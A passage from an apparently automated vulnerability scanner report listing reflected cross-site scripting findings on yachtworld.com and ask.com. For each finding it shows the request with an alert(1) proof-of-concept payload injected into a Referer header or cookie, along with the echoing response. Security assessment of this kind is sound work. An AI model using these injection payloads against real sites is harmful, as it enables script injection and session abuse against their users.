VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="javascript:alert(1)//b314c5c8" NAME="cust_url">
</FRAMESET>

...[SNIP]...

3.538. http://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80587"><script>alert(1)</script>5c11019fc5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /leaving_yw.cgi HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;
Referer: 80587"><script>alert(1)</script>5c11019fc5d

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:36:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=80587"><script>alert(1)</script>5c11019fc5d" NAME="back" noscroll>
<FRAME SRC="" NAME="cust_url"
...[SNIP]...

3.539. https://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de77"><script>alert(1)</script>c55d3d98538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:35 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=9de77"><script>alert(1)</script>c55d3d98538" NAME="back" noscroll>
<FRAME SRC="" NAME="cust_url"
...[SNIP]...

3.540. http://www.ask.com/ [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72c6e'-alert(1)-'7422fa4f21b was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F372c6e'-alert(1)-'7422fa4f21b; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:25 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:25 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:25 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F372c6e'-alert(1)-'7422fa4f21b;u4=;u3=;u2=0;ord=-1237693634?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

3.541. http://www.ask.com/about [user cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dda2f'-alert(1)-'5e3039848f8 was submitted in the user cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dirdda2f'-alert(1)-'5e3039848f8; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:14:29 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjI5LVVUQw%3D%3D&po=0&pp=dirdda2f%27-alert%281%29-%275e3039848f8; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:29 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:29 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:29 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:29 GMT; Path=/
Content-Length: 106206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>About Ask.com</title>
<link href="http://www.ask.com/inc/css/lib/yui/reset-fonts-grids_r2.8.css" type="text/css" rel="sty
...[SNIP]...
<script type="text/javascript">
var qstr = 'q=&o=0&l=dirdda2f'-alert(1)-'5e3039848f8&jss=1';
window.location = 'http://www.ask.com/about?'+ qstr;
</script>
...[SNIP]...

3.542. http://www.ask.com/about [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ae77'-alert(1)-'31fcaf72148 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F39ae77'-alert(1)-'31fcaf72148; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:24 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:24 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:24 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:24 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106813

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>About Ask.com</title>
<link href="http://www.ask.com/inc/css/lib/yui/reset-fonts-grids_r2.8.css" type="text/css" rel="sty
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F39ae77'-alert(1)-'31fcaf72148;u3=0;u2=;ord=-662979472?" width="1" height="1" frameborder="0">
...[SNIP]...

3.543. http://www.ask.com/about [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58e0'-alert(1)-'6c377da3def was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3d58e0'-alert(1)-'6c377da3def; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:27 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:27 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:27 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:27 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106813

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>About Ask.com</title>
<link href="http://www.ask.com/inc/css/lib/yui/reset-fonts-grids_r2.8.css" type="text/css" rel="sty
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3d58e0'-alert(1)-'6c377da3def;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-747319887?" width="1" height="1" frameborder="0">
...[SNIP]...

3.544. http://www.ask.com/about/legal/privacy [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/privacy

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1405d'-alert(1)-'86400391a6c was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F31405d'-alert(1)-'86400391a6c; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:03 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjAzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:03 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:03 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 39319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Privacy Policy</title>



<!-- y
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F31405d'-alert(1)-'86400391a6c;u3=0;u2=;ord=-710705947?" width="1" height="1" frameborder="0">
...[SNIP]...

3.545. http://www.ask.com/about/legal/privacy [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
